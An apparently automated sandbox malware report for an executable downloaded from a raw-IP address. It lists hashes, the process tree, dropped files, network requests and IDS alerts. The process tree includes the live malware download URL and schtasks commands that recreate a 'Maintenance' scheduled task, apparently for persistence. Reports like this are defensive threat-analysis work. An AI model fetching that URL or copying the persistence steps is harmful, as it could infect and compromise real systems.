URL: | http://89.109.35.231/exchange/wcxkmr.exe |
Full analysis: | https://app.any.run/tasks/d88ae982-2c69-434f-be3f-6c4f4b96c9a6 |
Verdict: | Malicious activity |
Analysis date: | June 12, 2019, 07:24:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 5D2574D0228B8B3A143F09868A969D74 |
SHA1: | 5C9BED577A2210DB2BD39BD8D4381840629B36F8 |
SHA256: | 6ABE942044593C8DF65E6AA144D2E6848CEC18B4339A922B0F572C7A82B48A96 |
SSDEEP: | 3:N1K/M9vACAIMIbAC:Ck9vACdMQ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
4064 | "C:\Program Files\Internet Explorer\iexplore.exe" http://89.109.35.231/exchange/wcxkmr.exe | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2632 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4064 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3544 | "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wcxkmr[1].exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wcxkmr[1].exe | iexplore.exe | |
User: admin Integrity Level: MEDIUM Description: 'i`u\#qsP94Vy Exit code: 0 Version: 99.8.1.0 | ||||
3560 | cmd /c ""C:\Users\admin\AppData\Local\Temp\zbe201961272453514.bat" " | C:\Windows\system32\cmd.exe | — | wcxkmr[1].exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2992 | cmd /c ""C:\Users\admin\AppData\Local\Temp\zb201961272453514.bat" " | C:\Windows\system32\cmd.exe | — | wcxkmr[1].exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2176 | Schtasks.EXE /delete /tn "Maintenance" /f | C:\Windows\system32\schtasks.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
252 | chcp 1251 | C:\Windows\system32\chcp.com | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Change CodePage Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3680 | Schtasks.EXE /create /tn "Maintenance" /xml "C:\Users\admin\AppData\Local\Temp\zx201961272453514.xml" | C:\Windows\system32\schtasks.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3984 | timeout /t 3 /nobreak | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF8E69440BF2AC1E56.TMP | — | |
MD5:— | SHA256:— | |||
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
4064 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{27E6829A-8CE3-11E9-A370-5254004A04AF}.dat | binary | |
MD5:6C8D28A0E6FFEAD478FBDA0FACEA1B13 | SHA256:AF758F9779B27F46E89472306B97641444FFE221A54FC9F46587FABA5616EE98 | |||
2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\9W6CHMMW\wcxkmr[1].exe | executable | |
MD5:5C9CA45B60DBC3EE0BFD36E404EA8D98 | SHA256:0CF94DF28CB907B5DEA25300B4BCF5853715277AA8FD03128D4D3E0744A38471 | |||
2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:1B228345A88416995D771707FF28547C | SHA256:4AB8002B110E4F02F3BC2A196B2719140D108C872E23BA868ECA4DD8272C8FAC | |||
3544 | wcxkmr[1].exe | C:\Users\admin\AppData\Roaming\Maintenance\apps\maintenance.exe | executable | |
MD5:3234A708095A7662A5E94543CA7B12E3 | SHA256:021174C1FAF22A9B4C2805932865FDD92134A92ABEE81C80DDCB729FB0D71D70 | |||
2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:BCA0BBDAD66E2C389E568D86CB363CD4 | SHA256:97502AA88D06489D841ADF95EB86267BB0AAE27CB27E2411E14E12F1E271441B | |||
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF48A47E4B9B11C662.TMP | — | |
MD5:— | SHA256:— | |||
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{27E68299-8CE3-11E9-A370-5254004A04AF}.dat | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2632 | iexplore.exe | GET | — | 89.109.35.231:80 | http://89.109.35.231/exchange/wcxkmr.exe | RU | — | — | suspicious |
4064 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4064 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2632 | iexplore.exe | 89.109.35.231:80 | — | PJSC Rostelecom | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2632 | iexplore.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
2632 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2632 | iexplore.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |